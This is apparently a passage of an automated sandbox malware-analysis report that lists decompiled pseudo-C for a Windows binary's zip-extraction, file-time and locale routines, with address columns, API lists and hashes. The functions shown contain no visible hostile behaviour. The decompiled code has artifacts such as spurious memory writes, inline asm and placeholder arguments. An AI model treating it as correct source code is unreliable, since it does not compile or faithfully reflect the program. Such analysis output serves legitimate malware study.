				if ( *((intOrPtr*)(_t167 + 0x90)) -  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x90)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c544f7;
				0xe4c623d0();
				return E00007FF67FF6E4C623B0(_t63, _t69,  *(_t167 + 0x120) ^ _t169);
			}

































                                                                                                                                                              0x7ff6e4c54270
                                                                                                                                                              0x7ff6e4c54270
                                                                                                                                                              0x7ff6e4c54270
                                                                                                                                                              0x7ff6e4c54277
                                                                                                                                                              0x7ff6e4c5427f
                                                                                                                                                              0x7ff6e4c54286
                                                                                                                                                              0x7ff6e4c54290
                                                                                                                                                              0x7ff6e4c54297
                                                                                                                                                              0x7ff6e4c5429a
                                                                                                                                                              0x7ff6e4c5429d
                                                                                                                                                              0x7ff6e4c542a0
                                                                                                                                                              0x7ff6e4c542a3
                                                                                                                                                              0x7ff6e4c542ac
                                                                                                                                                              0x7ff6e4c542b2
                                                                                                                                                              0x7ff6e4c542b7
                                                                                                                                                              0x7ff6e4c542b8
                                                                                                                                                              0x7ff6e4c542b8
                                                                                                                                                              0x7ff6e4c542bc
                                                                                                                                                              0x7ff6e4c542cc
                                                                                                                                                              0x7ff6e4c542d1
                                                                                                                                                              0x7ff6e4c542d2
                                                                                                                                                              0x7ff6e4c542e2
                                                                                                                                                              0x7ff6e4c542ee
                                                                                                                                                              0x7ff6e4c542f3
                                                                                                                                                              0x7ff6e4c542f6
                                                                                                                                                              0x7ff6e4c542fa
                                                                                                                                                              0x7ff6e4c542fe
                                                                                                                                                              0x7ff6e4c54305
                                                                                                                                                              0x7ff6e4c54309
                                                                                                                                                              0x7ff6e4c54311
                                                                                                                                                              0x7ff6e4c5432b
                                                                                                                                                              0x7ff6e4c54334
                                                                                                                                                              0x7ff6e4c54339
                                                                                                                                                              0x7ff6e4c54344
                                                                                                                                                              0x7ff6e4c54357
                                                                                                                                                              0x7ff6e4c5436c
                                                                                                                                                              0x7ff6e4c54372
                                                                                                                                                              0x7ff6e4c5437b
                                                                                                                                                              0x7ff6e4c54380
                                                                                                                                                              0x7ff6e4c54388
                                                                                                                                                              0x7ff6e4c5439b
                                                                                                                                                              0x7ff6e4c543b0
                                                                                                                                                              0x7ff6e4c543b6
                                                                                                                                                              0x7ff6e4c543bb
                                                                                                                                                              0x7ff6e4c543bf
                                                                                                                                                              0x7ff6e4c543c7
                                                                                                                                                              0x7ff6e4c543ce
                                                                                                                                                              0x7ff6e4c543d0
                                                                                                                                                              0x7ff6e4c543d8
                                                                                                                                                              0x7ff6e4c543eb
                                                                                                                                                              0x7ff6e4c543f8
                                                                                                                                                              0x7ff6e4c54400
                                                                                                                                                              0x7ff6e4c54406
                                                                                                                                                              0x7ff6e4c5440b
                                                                                                                                                              0x7ff6e4c5440f
                                                                                                                                                              0x7ff6e4c54417
                                                                                                                                                              0x7ff6e4c54420
                                                                                                                                                              0x7ff6e4c54425
                                                                                                                                                              0x7ff6e4c5442f
                                                                                                                                                              0x7ff6e4c54436
                                                                                                                                                              0x7ff6e4c54442
                                                                                                                                                              0x7ff6e4c54447
                                                                                                                                                              0x7ff6e4c54450
                                                                                                                                                              0x7ff6e4c54454
                                                                                                                                                              0x7ff6e4c54467
                                                                                                                                                              0x7ff6e4c54470
                                                                                                                                                              0x7ff6e4c54476
                                                                                                                                                              0x7ff6e4c5447f
                                                                                                                                                              0x7ff6e4c54491
                                                                                                                                                              0x7ff6e4c54496
                                                                                                                                                              0x7ff6e4c5449a
                                                                                                                                                              0x7ff6e4c544a5
                                                                                                                                                              0x7ff6e4c544bb
                                                                                                                                                              0x7ff6e4c544d0
                                                                                                                                                              0x7ff6e4c544d2
                                                                                                                                                              0x7ff6e4c544f6

                                                                                                                                                              APIs
                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E4C544F7
                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E4C544FD
                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E4C54503
                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E4C54509
                                                                                                                                                                • Part of subcall function 00007FF6E4C51330: __std_exception_copy.LIBVCRUNTIME ref: 00007FF6E4C5135F
                                                                                                                                                                • Part of subcall function 00007FF6E4C641CC: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6E4C60F5E), ref: 00007FF6E4C64210
                                                                                                                                                                • Part of subcall function 00007FF6E4C641CC: _purecall.KERNELBASE(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6E4C60F5E), ref: 00007FF6E4C64256
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$FileHeader__std_exception_copy_purecall
                                                                                                                                                              • String ID: openinginternal file '$' in zip$Error
                                                                                                                                                              • API String ID: 1678417096-2308420065
                                                                                                                                                              • Opcode ID: 50df2fdaed84bd4361c0c40a151f0902aef4ce6bc0f16fc0520efbf9651937a2
                                                                                                                                                              • Instruction ID: e883fbe4d9ca6a0a1e9bfb6fab4f0cec71cac1cb0d761ee4fd23f90a9c14b4cf
                                                                                                                                                              • Opcode Fuzzy Hash: 50df2fdaed84bd4361c0c40a151f0902aef4ce6bc0f16fc0520efbf9651937a2
                                                                                                                                                              • Instruction Fuzzy Hash: 4D919167A9868345EB149B36C8843FD2371EF45FD8F405232DA1D87AD6DF6EE181C20A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C545B0 Relevance: 10.6, APIs: 7, Instructions: 144timefileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 33%
                                                                                                                                                              			E00007FF67FF6E4C545B0(void* __ebx, void* __ecx, void* __edx, long long __rcx, intOrPtr* __rdx, void* __r8, void* __r9, void* __r11) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* _t58;
				void* _t73;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t79;
				signed long long _t89;
				signed long long _t90;
				intOrPtr _t97;
				intOrPtr* _t107;
				intOrPtr _t133;
				intOrPtr _t146;
				void* _t148;
				void* _t150;
				void* _t151;
				signed long long _t152;
				long long _t163;

				_t75 = __edx;
				_t74 = __ecx;
				_t73 = __ebx;
				_t150 = _t151 - 0xb0;
				_t152 = _t151 - 0x1b0;
				_t89 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_t90 = _t89 ^ _t152;
				 *(_t150 + 0xa0) = _t90;
				_t148 = __r8;
				_t107 = __rdx;
				_t163 = __rcx;
				 *_t90 =  *_t90 + _t58;
				if (_t79 > 0) goto 0xe4c54630;
				 *_t90 =  *_t90 + _t58 + bpl;
				E00007FF67FF6E4C586E0();
				_t133 =  *((intOrPtr*)(_t150 + 0x98));
				if (_t133 - 0x10 < 0) goto 0xe4c5463c;
				if (_t133 + 1 - 0x1000 < 0) goto 0xe4c54637;
				if ( *((intOrPtr*)(_t150 + 0x80)) -  *((intOrPtr*)( *((intOrPtr*)(_t150 + 0x80)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c547cf;
				0xe4c623d0();
				if ( *((long long*)(_t107 + 0x18)) - 0x10 < 0) goto 0xe4c54649;
				 *((long long*)(_t152 + 0x20)) = 1;
				r9d = 0x40;
				r8d = __r9 - 0x20;
				E00007FF67FF6E4C50B80(_t73, __ecx, _t107, _t152 + 0x70,  *_t107, __r8, _t150, __r11);
				_t97 =  *((intOrPtr*)(_t152 + 0x70));
				if ( *((long long*)(_t150 +  *((intOrPtr*)(_t97 + 4)) - 0x80)) != 0) goto 0xe4c54737;
				E00007FF67FF6E4C547E0(_t76, _t107, _t163, _t152 + 0x70, _t148);
				r14d = 0;
				_t77 =  ==  ? r14d : _t76;
				E00007FF67FF6E4C53130(_t97, _t97, _t152 + 0x70);
				if ( *((long long*)(_t107 + 0x18)) - 0x10 < 0) goto 0xe4c546aa;
				 *((long long*)(_t152 + 0x30)) = _t163;
				 *((intOrPtr*)(_t152 + 0x28)) = r14d;
				 *((long long*)(_t152 + 0x20)) = 3;
				r9d = 0;
				r8d = 0;
				asm("adc eax, 0x34b00");
				if (_t97 == 0xffffffff) goto 0xe4c54742;
				GetFileTime(??, ??, ??, ??);
				DosDateTimeToFileTime(??, ??, ??);
				LocalFileTimeToFileTime(??, ??);
				SetFileTime(??, ??, ??, ??);
				CloseHandle(??);
				goto 0xe4c54742;
				E00007FF67FF6E4C53130(_t97 - 0xffffffff, _t97, _t152 + 0x70);
				 *((long long*)(_t152 +  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x70)) + 4)) + 0x70)) = 0xe4c899f8;
				 *((long long*)(_t152 +  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x70)) + 4)) + 0x6c)) =  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x70)) + 4)) - 0xa8;
				E00007FF67FF6E4C49470(_t75, _t152 + 0x78);
				 *((long long*)(_t152 +  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x70)) + 4)) + 0x70)) = 0xe4c897a8;
				_t146 =  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x70)) + 4));
				r8d = _t146 - 0x10;
				 *((intOrPtr*)(_t152 + _t146 + 0x6c)) = r8d;
				 *((long long*)(_t150 + 0x18)) = 0xe4c89778;
				return E00007FF67FF6E4C623B0(E00007FF67FF6E4C61494(_t150 + 0x18), _t74,  *(_t150 + 0xa0) ^ _t152);
			}























                                                                                                                                                              0x7ff6e4c545b0
                                                                                                                                                              0x7ff6e4c545b0
                                                                                                                                                              0x7ff6e4c545b0
                                                                                                                                                              0x7ff6e4c545b7
                                                                                                                                                              0x7ff6e4c545bf
                                                                                                                                                              0x7ff6e4c545c6
                                                                                                                                                              0x7ff6e4c545cd
                                                                                                                                                              0x7ff6e4c545d0
                                                                                                                                                              0x7ff6e4c545d7
                                                                                                                                                              0x7ff6e4c545da
                                                                                                                                                              0x7ff6e4c545dd
                                                                                                                                                              0x7ff6e4c545e9
                                                                                                                                                              0x7ff6e4c545ed
                                                                                                                                                              0x7ff6e4c545ef
                                                                                                                                                              0x7ff6e4c545f5
                                                                                                                                                              0x7ff6e4c545fb
                                                                                                                                                              0x7ff6e4c54606
                                                                                                                                                              0x7ff6e4c5461c
                                                                                                                                                              0x7ff6e4c54631
                                                                                                                                                              0x7ff6e4c54637
                                                                                                                                                              0x7ff6e4c54644
                                                                                                                                                              0x7ff6e4c54649
                                                                                                                                                              0x7ff6e4c54651
                                                                                                                                                              0x7ff6e4c54657
                                                                                                                                                              0x7ff6e4c54660
                                                                                                                                                              0x7ff6e4c54666
                                                                                                                                                              0x7ff6e4c54674
                                                                                                                                                              0x7ff6e4c54685
                                                                                                                                                              0x7ff6e4c5468a
                                                                                                                                                              0x7ff6e4c5468f
                                                                                                                                                              0x7ff6e4c54698
                                                                                                                                                              0x7ff6e4c546a5
                                                                                                                                                              0x7ff6e4c546aa
                                                                                                                                                              0x7ff6e4c546af
                                                                                                                                                              0x7ff6e4c546b4
                                                                                                                                                              0x7ff6e4c546bc
                                                                                                                                                              0x7ff6e4c546bf
                                                                                                                                                              0x7ff6e4c546cb
                                                                                                                                                              0x7ff6e4c546d7
                                                                                                                                                              0x7ff6e4c546eb
                                                                                                                                                              0x7ff6e4c546fe
                                                                                                                                                              0x7ff6e4c5470e
                                                                                                                                                              0x7ff6e4c54726
                                                                                                                                                              0x7ff6e4c5472f
                                                                                                                                                              0x7ff6e4c54735
                                                                                                                                                              0x7ff6e4c5473c
                                                                                                                                                              0x7ff6e4c54752
                                                                                                                                                              0x7ff6e4c54766
                                                                                                                                                              0x7ff6e4c5476f
                                                                                                                                                              0x7ff6e4c54784
                                                                                                                                                              0x7ff6e4c5478e
                                                                                                                                                              0x7ff6e4c54792
                                                                                                                                                              0x7ff6e4c54796
                                                                                                                                                              0x7ff6e4c547a2
                                                                                                                                                              0x7ff6e4c547ce

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileTime$CloseCreateDateHandleLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3124557046-0
                                                                                                                                                              • Opcode ID: dc91472191fceb3df31de210867b0d9bcd4ff41098a6b7ef16dc962c7d027e86
                                                                                                                                                              • Instruction ID: 5df2d4e83565ae642a418c3c113774e9e792665599792aca4679aa2821887490
                                                                                                                                                              • Opcode Fuzzy Hash: dc91472191fceb3df31de210867b0d9bcd4ff41098a6b7ef16dc962c7d027e86
                                                                                                                                                              • Instruction Fuzzy Hash: 77519037648A8786EB109F35E4843AE6370FB85F94F504232DA5E83AA8DF3DD546CB05
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C42420 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                              			E00007FF67FF6E4C42420(long long __rax, long long __rbx, long long* __rcx, void* __rdx, long long __rsi) {
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t61;
				long long _t74;
				intOrPtr _t89;
				long long _t105;
				long long* _t108;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t116;
				void* _t117;
				long long _t119;

				_t74 = __rax;
				 *((long long*)(_t113 + 0x10)) = __rbx;
				 *((long long*)(_t113 + 0x18)) = __rsi;
				_t111 = _t113 - 0x47;
				_t108 = __rcx;
				if (__rcx == 0) goto 0xe4c425aa;
				if ( *__rcx != 0) goto 0xe4c425aa;
				 *((intOrPtr*)(__rax - 0x75)) =  *((intOrPtr*)(__rax - 0x75)) + _t60;
				asm("clc");
				 *((long long*)(_t111 + 0x67)) = __rax;
				_t89 =  *((intOrPtr*)(__rdx + 8));
				if (_t89 == 0) goto 0xe4c4247c;
				if ( *((intOrPtr*)(_t89 + 0x28)) != 0) goto 0xe4c42483;
				goto 0xe4c42483;
				E00007FF67FF6E4C60D0C(_t61, _t111 - 0x79);
				r14d = r14d ^ r14d;
				 *((long long*)(_t111 - 0x71)) = _t119;
				 *((intOrPtr*)(_t111 - 0x69)) = r14b;
				 *((long long*)(_t111 - 0x61)) = _t119;
				 *((intOrPtr*)(_t111 - 0x59)) = r14b;
				 *((long long*)(_t111 - 0x51)) = _t119;
				 *((intOrPtr*)(_t111 - 0x49)) = r14w;
				 *((long long*)(_t111 - 0x41)) = _t119;
				 *((intOrPtr*)(_t111 - 0x39)) = r14w;
				 *((long long*)(_t111 - 0x31)) = _t119;
				 *((intOrPtr*)(_t111 - 0x29)) = r14b;
				 *((long long*)(_t111 - 0x21)) = _t119;
				 *((intOrPtr*)(_t111 - 0x19)) = r14b;
				if (0xe4c9f71b == 0) goto 0xe4c425c7;
				E00007FF67FF6E4C612B8(_t74, 0xe4c9f71b, _t111 - 0x79, 0xe4c9f71b);
				 *(_t105 + 8) = r14d;
				 *_t105 = 0xe4c929c0;
				E00007FF67FF6E4C617C4(0xe4c929c0, _t111 - 0x11, 0xe4c9f71b, _t116);
				asm("movups xmm0, [eax]");
				asm("movups [edi+0x10], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [edi+0x20], xmm1");
				E00007FF67FF6E4C619B4(0xe4c929c0, 0xe4c9f71b, _t111 + 0xf, _t117);
				asm("movups xmm0, [eax]");
				asm("movups [edi+0x30], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [edi+0x40], xmm1");
				asm("movsd xmm0, [eax+0x20]");
				asm("movsd [edi+0x50], xmm0");
				 *((long long*)(_t105 + 0x58)) =  *((intOrPtr*)(0x7ff6e4c929e8));
				 *_t108 = _t105;
				E00007FF67FF6E4C61324(_t111 - 0x79);
				if ( *((intOrPtr*)(_t111 - 0x21)) == 0) goto 0xe4c42542;
				E00007FF67FF6E4C69C88(_t60, _t61, 0xe4c9f71b, 0xe4c9f71b, _t119);
				 *((long long*)(_t111 - 0x21)) = _t119;
				if ( *((intOrPtr*)(_t111 - 0x31)) == 0) goto 0xe4c42554;
				E00007FF67FF6E4C69C88(_t60, _t61, 0xe4c9f71b, 0xe4c9f71b, _t105);
				 *((long long*)(_t111 - 0x31)) = _t119;
				if ( *((intOrPtr*)(_t111 - 0x41)) == 0) goto 0xe4c42566;
				E00007FF67FF6E4C69C88(_t60, _t61, 0xe4c9f71b, 0xe4c9f71b, _t110);
				 *((long long*)(_t111 - 0x41)) = _t119;
				if ( *((intOrPtr*)(_t111 - 0x51)) == 0) goto 0xe4c42578;
				E00007FF67FF6E4C69C88(_t60, _t61, 0xe4c9f71b, 0xe4c9f71b);
				 *((long long*)(_t111 - 0x51)) = _t119;
				if ( *((intOrPtr*)(_t111 - 0x61)) == 0) goto 0xe4c4258a;
				E00007FF67FF6E4C69C88(_t60, _t61, 0xe4c9f71b, 0xe4c9f71b);
				 *((long long*)(_t111 - 0x61)) = _t119;
				if ( *((intOrPtr*)(_t111 - 0x71)) == 0) goto 0xe4c4259c;
				_t58 = E00007FF67FF6E4C69C88(_t60, _t61, 0xe4c9f71b, 0xe4c9f71b);
				 *((long long*)(_t111 - 0x71)) = _t119;
				_t59 = E00007FF67FF6E4C60D84(_t58, _t111 - 0x79);
				asm("loopne 0x2");
				 *0x2 =  *0x2 + _t59;
				return _t59;
			}

















                                                                                                                                                              0x7ff6e4c42420
                                                                                                                                                              0x7ff6e4c42420
                                                                                                                                                              0x7ff6e4c42425
                                                                                                                                                              0x7ff6e4c4242e
                                                                                                                                                              0x7ff6e4c4243d
                                                                                                                                                              0x7ff6e4c42443
                                                                                                                                                              0x7ff6e4c4244d
                                                                                                                                                              0x7ff6e4c4245c
                                                                                                                                                              0x7ff6e4c4245f
                                                                                                                                                              0x7ff6e4c42460
                                                                                                                                                              0x7ff6e4c42464
                                                                                                                                                              0x7ff6e4c4246b
                                                                                                                                                              0x7ff6e4c42474
                                                                                                                                                              0x7ff6e4c4247a
                                                                                                                                                              0x7ff6e4c42489
                                                                                                                                                              0x7ff6e4c4248f
                                                                                                                                                              0x7ff6e4c42492
                                                                                                                                                              0x7ff6e4c42496
                                                                                                                                                              0x7ff6e4c4249a
                                                                                                                                                              0x7ff6e4c4249e
                                                                                                                                                              0x7ff6e4c424a2
                                                                                                                                                              0x7ff6e4c424a6
                                                                                                                                                              0x7ff6e4c424ab
                                                                                                                                                              0x7ff6e4c424af
                                                                                                                                                              0x7ff6e4c424b4
                                                                                                                                                              0x7ff6e4c424b8
                                                                                                                                                              0x7ff6e4c424bc
                                                                                                                                                              0x7ff6e4c424c0
                                                                                                                                                              0x7ff6e4c424c7
                                                                                                                                                              0x7ff6e4c424d4
                                                                                                                                                              0x7ff6e4c424da
                                                                                                                                                              0x7ff6e4c424e5
                                                                                                                                                              0x7ff6e4c424ec
                                                                                                                                                              0x7ff6e4c424f1
                                                                                                                                                              0x7ff6e4c424f4
                                                                                                                                                              0x7ff6e4c424f8
                                                                                                                                                              0x7ff6e4c424fc
                                                                                                                                                              0x7ff6e4c42504
                                                                                                                                                              0x7ff6e4c42509
                                                                                                                                                              0x7ff6e4c4250c
                                                                                                                                                              0x7ff6e4c42510
                                                                                                                                                              0x7ff6e4c42514
                                                                                                                                                              0x7ff6e4c42518
                                                                                                                                                              0x7ff6e4c4251d
                                                                                                                                                              0x7ff6e4c42525
                                                                                                                                                              0x7ff6e4c42528
                                                                                                                                                              0x7ff6e4c4252f
                                                                                                                                                              0x7ff6e4c4253b
                                                                                                                                                              0x7ff6e4c4253d
                                                                                                                                                              0x7ff6e4c42542
                                                                                                                                                              0x7ff6e4c4254d
                                                                                                                                                              0x7ff6e4c4254f
                                                                                                                                                              0x7ff6e4c42554
                                                                                                                                                              0x7ff6e4c4255f
                                                                                                                                                              0x7ff6e4c42561
                                                                                                                                                              0x7ff6e4c42566
                                                                                                                                                              0x7ff6e4c42571
                                                                                                                                                              0x7ff6e4c42573
                                                                                                                                                              0x7ff6e4c42578
                                                                                                                                                              0x7ff6e4c42583
                                                                                                                                                              0x7ff6e4c42585
                                                                                                                                                              0x7ff6e4c4258a
                                                                                                                                                              0x7ff6e4c42595
                                                                                                                                                              0x7ff6e4c42597
                                                                                                                                                              0x7ff6e4c4259c
                                                                                                                                                              0x7ff6e4c425a4
                                                                                                                                                              0x7ff6e4c425b3
                                                                                                                                                              0x7ff6e4c425b5
                                                                                                                                                              0x7ff6e4c425c6

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                              • API String ID: 1386471777-1405518554
                                                                                                                                                              • Opcode ID: e7ed4f614069cfa04c96b321ac48d6335239eaa31ead6db069acb751e609dfe9
                                                                                                                                                              • Instruction ID: 97c379381c8ae35fe09af084a0d2a2f92af6907e1383772e0c18688df3e0f493
                                                                                                                                                              • Opcode Fuzzy Hash: e7ed4f614069cfa04c96b321ac48d6335239eaa31ead6db069acb751e609dfe9
                                                                                                                                                              • Instruction Fuzzy Hash: 86518D27F59B428AEB04CB70D1913FC23B4EF44B84B044136DE4DA7A56DF39A566930A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C52600 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                              			E00007FF67FF6E4C52600(long long __rax, long long __rbx, long long* __rcx, void* __rdx, long long __rdi, long long __rsi) {
				void* _t59;
				void* _t60;
				void* _t62;
				void* _t63;
				intOrPtr _t79;
				void* _t102;
				long long* _t107;
				long long* _t111;
				void* _t112;
				void* _t113;
				void* _t115;
				void* _t119;
				long long _t122;

				 *((long long*)(_t115 + 0x10)) = __rbx;
				 *((long long*)(_t115 + 0x18)) = __rsi;
				 *((long long*)(_t115 + 0x20)) = __rdi;
				_t113 = _t115 - 0x47;
				_t111 = __rcx;
				r15d = 0;
				 *((long long*)(_t113 + 0x67)) = __rbx;
				if (__rcx == 0) goto 0xe4c5276c;
				if ( *((intOrPtr*)(__rcx)) != __rbx) goto 0xe4c5276c;
				_t6 = _t122 + 0x10; // 0x10
				_t62 = _t6;
				E00007FF67FF6E4C623D8(__rax, __rcx);
				_t107 = __rax;
				 *((long long*)(_t113 + 0x67)) = __rax;
				if (__rax == 0) goto 0xe4c526e2;
				_t79 =  *((intOrPtr*)(__rdx + 8));
				if (_t79 == 0) goto 0xe4c52672;
				if ( *((intOrPtr*)(_t79 + 0x28)) != 0) goto 0xe4c52679;
				goto 0xe4c52679;
				E00007FF67FF6E4C60D0C(_t63, _t113 - 0x29);
				 *((long long*)(_t113 - 0x21)) = _t122;
				 *((char*)(_t113 - 0x19)) = 0;
				 *((long long*)(_t113 - 0x11)) = _t122;
				 *((char*)(_t113 - 9)) = 0;
				 *((long long*)(_t113 - 1)) = _t122;
				 *((intOrPtr*)(_t113 + 7)) = r15w;
				 *((long long*)(_t113 + 0xf)) = _t122;
				 *((intOrPtr*)(_t113 + 0x17)) = r15w;
				 *((long long*)(_t113 + 0x1f)) = _t122;
				 *((char*)(_t113 + 0x27)) = 0;
				 *((long long*)(_t113 + 0x2f)) = _t122;
				 *((char*)(_t113 + 0x37)) = 0;
				if (0xe4c9f71b == 0) goto 0xe4c5278e;
				E00007FF67FF6E4C612B8(_t79, 0xe4c9f71b, _t113 - 0x29, 0xe4c9f71b);
				 *_t107 = 0xe4c89a80;
				goto 0xe4c526e5;
				 *_t111 = _t122;
				if ((r15d & 0x00000001) == 0) goto 0xe4c5276c;
				E00007FF67FF6E4C61324(_t113 - 0x29);
				if ( *((intOrPtr*)(_t113 + 0x2f)) == 0) goto 0xe4c52704;
				E00007FF67FF6E4C69C88(_t62, _t63, 0x1, 0xe4c9f71b, _t122);
				 *((long long*)(_t113 + 0x2f)) = _t122;
				if ( *((intOrPtr*)(_t113 + 0x1f)) == 0) goto 0xe4c52716;
				E00007FF67FF6E4C69C88(_t62, _t63, 0x1, 0xe4c9f71b, _t119);
				 *((long long*)(_t113 + 0x1f)) = _t122;
				if ( *((intOrPtr*)(_t113 + 0xf)) == 0) goto 0xe4c52728;
				E00007FF67FF6E4C69C88(_t62, _t63, 0x1, 0xe4c9f71b, _t112);
				 *((long long*)(_t113 + 0xf)) = _t122;
				if ( *((intOrPtr*)(_t113 - 1)) == 0) goto 0xe4c5273a;
				E00007FF67FF6E4C69C88(_t62, _t63, 0x1, 0xe4c9f71b);
				 *((long long*)(_t113 - 1)) = _t122;
				if ( *((intOrPtr*)(_t113 - 0x11)) == 0) goto 0xe4c5274c;
				E00007FF67FF6E4C69C88(_t62, _t63, 0x1, 0xe4c9f71b);
				 *((long long*)(_t113 - 0x11)) = _t122;
				if ( *((intOrPtr*)(_t113 - 0x21)) == 0) goto 0xe4c5275e;
				_t59 = E00007FF67FF6E4C69C88(_t62, _t63, 0x1, 0xe4c9f71b);
				 *((long long*)(_t113 - 0x21)) = _t122;
				_t102 = _t113 - 0x29;
				_t60 = E00007FF67FF6E4C60D84(_t59, _t102);
				 *0x4 =  *0x4 + _t60;
				 *((intOrPtr*)(_t102 - 0x75)) =  *((intOrPtr*)(_t102 - 0x75)) + _t62;
				_t47 = _t102 - 0x75;
				 *_t47 =  *((intOrPtr*)(_t102 - 0x75)) - _t62;
				if ( *_t47 >= 0) goto 0xe4c527b1;
				return _t60;
			}
















                                                                                                                                                              0x7ff6e4c52600
                                                                                                                                                              0x7ff6e4c52605
                                                                                                                                                              0x7ff6e4c5260a
                                                                                                                                                              0x7ff6e4c52614
                                                                                                                                                              0x7ff6e4c52623
                                                                                                                                                              0x7ff6e4c52626
                                                                                                                                                              0x7ff6e4c5262c
                                                                                                                                                              0x7ff6e4c52632
                                                                                                                                                              0x7ff6e4c5263b
                                                                                                                                                              0x7ff6e4c52641
                                                                                                                                                              0x7ff6e4c52641
                                                                                                                                                              0x7ff6e4c52645
                                                                                                                                                              0x7ff6e4c5264a
                                                                                                                                                              0x7ff6e4c5264d
                                                                                                                                                              0x7ff6e4c52654
                                                                                                                                                              0x7ff6e4c5265a
                                                                                                                                                              0x7ff6e4c52661
                                                                                                                                                              0x7ff6e4c5266a
                                                                                                                                                              0x7ff6e4c52670
                                                                                                                                                              0x7ff6e4c5267f
                                                                                                                                                              0x7ff6e4c52685
                                                                                                                                                              0x7ff6e4c52689
                                                                                                                                                              0x7ff6e4c5268d
                                                                                                                                                              0x7ff6e4c52691
                                                                                                                                                              0x7ff6e4c52695
                                                                                                                                                              0x7ff6e4c52699
                                                                                                                                                              0x7ff6e4c5269e
                                                                                                                                                              0x7ff6e4c526a2
                                                                                                                                                              0x7ff6e4c526a7
                                                                                                                                                              0x7ff6e4c526ab
